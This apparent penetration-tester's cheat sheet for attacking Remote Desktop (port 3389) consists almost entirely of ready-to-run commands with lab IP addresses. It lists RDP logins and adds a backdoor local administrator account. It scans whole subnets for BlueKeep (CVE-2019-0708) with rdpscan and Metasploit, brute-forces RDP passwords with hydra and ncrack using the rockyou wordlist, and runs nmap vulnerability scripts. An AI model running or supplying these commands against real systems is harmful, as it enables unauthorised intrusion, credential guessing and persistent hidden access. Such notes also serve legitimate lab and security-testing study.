RDP 3389

#login

rdesktop -u DISCO 10.11.1.13
xfreerdp /u:admin /v:10.10.10.10 + clipboard

#Add a user

net user redcliff password123 /add
net localgroup Administrators redcliff /add
net localgroup "Remote Desktop Users" redcliff /ADD

#RDPscan

sudo git clone https://github.com/robertdavidgraham/rdpscan.git

./rdpscan 10.10.10.10

#msfconsole | bluekeep

nmap -p3389 -T5 <subnet>/24 -oG - | awk '/Up$/{print $2}' > rdp.lst
msfconsole
> use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
> set RHOSTS file:<path to rdp.lst>
> run
...
 [+] 10.X.X.X:3389      - The target is vulnerable. The target attempted cleanup of the incorrectly-bound MS_T120 channel.

#Bruteforcing

ncrack -vv --user -P pwds.txt rdp:// 
hydra -V -f -L -P rdp://
ncrack -vv --user DISCO -P passwords.txt rdp://10.11.1.1 
sudo ncrack -vv --user peter -P /usr/share/wordlists/rockyou.txt rdp://10.11.1.11:3389
hydra -V -f -L DISCO.txt -P passwords.txt rdp://10.11.1.13

#nmap script

nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 10.11.1.1

#ms-wbt-server Microsoft Terminal Services

nmap -sV -Pn --script=rdp-vuln-ms12-020 -p 3389 10.11.1.11